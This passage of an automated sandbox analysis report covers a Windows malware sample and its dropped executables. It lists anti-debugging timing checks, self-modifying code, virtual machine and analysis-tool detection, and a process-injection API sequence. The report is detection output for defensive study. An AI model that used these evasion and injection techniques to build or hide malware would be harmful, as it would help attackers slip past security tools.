Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492052B second address: 492057F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0226B6413Ah 0x00000011 pushad 0x00000012 mov eax, 246AB19Dh 0x00000017 pushfd 0x00000018 jmp 00007F01B44E8C9Ah 0x0000001d and al, FFFFFFF8h 0x00000020 jmp 00007F01B44E8C9Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov esi, dword ptr fs:[00000018h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F01B44E8CA0h 0x00000037 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492057F second address: 4920583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920583 second address: 4920589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920589 second address: 492059A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492059A second address: 492059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492059E second address: 49205D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+00000FDCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, ch 0x00000013 pushfd 0x00000014 jmp 00007F01B4D45EDBh 0x00000019 jmp 00007F01B4D45EE3h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49205D2 second address: 49205EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920717 second address: 492071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492071D second address: 4920721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920721 second address: 4920725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920725 second address: 492079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d pushfd 0x0000000e jmp 00007F01B44E8CA6h 0x00000013 sub cx, C6A8h 0x00000018 jmp 00007F01B44E8C9Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esp], edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edi 0x00000026 pop ecx 0x00000027 pushfd 0x00000028 jmp 00007F01B44E8CA7h 0x0000002d or ax, 6C9Eh 0x00000032 jmp 00007F01B44E8CA9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492079B second address: 49207D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F01B4D45EDEh 0x00000011 xchg eax, esi 0x00000012 jmp 00007F01B4D45EE0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49207D9 second address: 49207DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49207DD second address: 49207E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49207E1 second address: 49207E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49207E7 second address: 4920812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F01B4D45EE5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920876 second address: 492088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [76FF459Ch], 05h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492088D second address: 4920893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920893 second address: 4920899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920899 second address: 492089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492089D second address: 49208E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007F01B44E8C9Ch 0x00000010 popad 0x00000011 mov dword ptr [ebp-04h], edi 0x00000014 jmp 00007F01B44E8CA0h 0x00000019 je 00007F0226B63E55h 0x0000001f pushad 0x00000020 mov edi, ecx 0x00000022 mov bh, ah 0x00000024 popad 0x00000025 mov ecx, dword ptr [esi+04h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F01B44E8CA0h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49208E9 second address: 4920922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F01B4D45EE6h 0x0000000f push eax 0x00000010 jmp 00007F01B4D45EDBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920922 second address: 4920926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920926 second address: 492092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492092A second address: 4920930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920930 second address: 492094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492094D second address: 492097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [esi+08h] 0x0000000e jmp 00007F01B44E8C9Eh 0x00000013 mov edx, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492097D second address: 4920981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920981 second address: 492099E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 492099E second address: 49209DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0227398D1Dh 0x00000010 mov edi, edi 0x00000012 push ebp 0x00000013 mov ebp, esp 0x00000015 push ecx 0x00000016 push esi 0x00000017 mov esi, edx 0x00000019 push edi 0x0000001a cmp ecx, 00000107h 0x00000020 jbe 00007F01B4D45EEEh 0x00000022 sub ecx, 0000010Fh 0x00000028 je 00007F01B4D45F08h 0x0000002a sub ecx, 11h 0x0000002d je 00007F01B4D45F03h 0x0000002f sub ecx, 00000166h 0x00000035 je 00007F01B4D45EFBh 0x00000037 xor eax, eax 0x00000039 pop edi 0x0000003a inc eax 0x0000003b pop esi 0x0000003c leave 0x0000003d ret 0x0000003e jmp 00007F01B4D45EE2h 0x00000043 test eax, eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F01B4D45EE7h 0x0000004c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49209DB second address: 49209F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49209F3 second address: 49209F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49209F7 second address: 4920A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0226B3BA83h 0x0000000e jmp 00007F01B44E8CA7h 0x00000013 mov eax, dword ptr [76FF4C30h] 0x00000018 jmp 00007F01B44E8CA6h 0x0000001d mov edx, dword ptr [ebx] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F01B44E8CA7h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920A52 second address: 4920A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920A57 second address: 4920A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F01B44E8CA5h 0x0000000a adc ecx, 659EEB96h 0x00000010 jmp 00007F01B44E8CA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test byte ptr [eax], 00000002h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F01B44E8C9Dh 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4920A9E second address: 4920AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F02273C0EE5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F01B4D45EDDh 0x00000016 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
Source: C:\ProgramData\giab\fvvb.exe	Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
Source: C:\ProgramData\giab\fvvb.exe	Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code

Source: C:\ProgramData\giab\fvvb.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe

Code function: 5_2_04920C2D rdtsc

5_2_04920C2D

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 360000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 360000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Window / User API: threadDelayed 9660	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window / User API: threadDelayed 1069	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window / User API: threadDelayed 1178	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window / User API: threadDelayed 946	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window / User API: threadDelayed 1383	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Window / User API: threadDelayed 1071	Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	API coverage: 1.9 %

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7528	Thread sleep count: 9660 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7528	Thread sleep time: -289800000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7552	Thread sleep time: -1080000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7548	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe TID: 7768	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7944	Thread sleep time: -2139069s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7952	Thread sleep time: -120060s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7908	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7928	Thread sleep time: -2357178s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7924	Thread sleep time: -1892946s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7932	Thread sleep time: -2767383s >= -30000s	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe TID: 7936	Thread sleep time: -2143071s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Last function: Thread delayed
Source: C:\ProgramData\giab\fvvb.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0009F011 FindFirstFileExW,	0_2_0009F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0044F011 FindFirstFileExW,	1_2_0044F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0044F011 FindFirstFileExW,	3_2_0044F011

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_000693D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_000693D0

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: cubrodriver.exe, cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: fvvb.exe, 00000006.00000002.3780677288.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: gbdyllo
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: ollydbg
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\giab\fvvb.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\ProgramData\giab\fvvb.exe	File opened: NTICE
Source: C:\ProgramData\giab\fvvb.exe	File opened: SICE
Source: C:\ProgramData\giab\fvvb.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\giab\fvvb.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe

Code function: 5_2_04920C2D rdtsc

5_2_04920C2D

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0008A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0008A245

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_00096092 mov eax, dword ptr fs:[00000030h]	0_2_00096092
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008DC00 mov eax, dword ptr fs:[00000030h]	0_2_0008DC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00446092 mov eax, dword ptr fs:[00000030h]	1_2_00446092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043DC00 mov eax, dword ptr fs:[00000030h]	1_2_0043DC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_00446092 mov eax, dword ptr fs:[00000030h]	3_2_00446092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043DC00 mov eax, dword ptr fs:[00000030h]	3_2_0043DC00

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_000A0592 GetProcessHeap,

0_2_000A0592

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0008A245
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008A3A8 SetUnhandledExceptionFilter,	0_2_0008A3A8
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0008EC0D
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0008995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0008995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0043A245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043A3A8 SetUnhandledExceptionFilter,	1_2_0043A3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0043EC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0043995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0043995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0043A245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043A3A8 SetUnhandledExceptionFilter,	3_2_0043A3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0043EC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0043995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0043995A

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_00068070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_00068070

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"			Jump to behavior

Source: cubrodriver.exe, cubrodriver.exe, 00000005.00000002.1446089309.000000000058F000.00000040.00000001.01000000.0000000A.sdmp, fvvb.exe, fvvb.exe, 00000006.00000002.3779328273.000000000058F000.00000040.00000001.01000000.0000000B.sdmp

Binary or memory string: z}Program Manager

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0008A42F cpuid

0_2_0008A42F

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: EnumSystemLocalesW,	0_2_000A2168
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: EnumSystemLocalesW,	0_2_000A21B3
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: EnumSystemLocalesW,	0_2_000A224E
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: EnumSystemLocalesW,	0_2_0009825C
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_000A22D9
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetLocaleInfoW,	0_2_000A252C
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_000A2652
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetLocaleInfoW,	0_2_000A2758
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetLocaleInfoW,	0_2_0009877E
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_000A2827
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_000A1EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_004520C1
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_00452168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_004521B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_0045224E
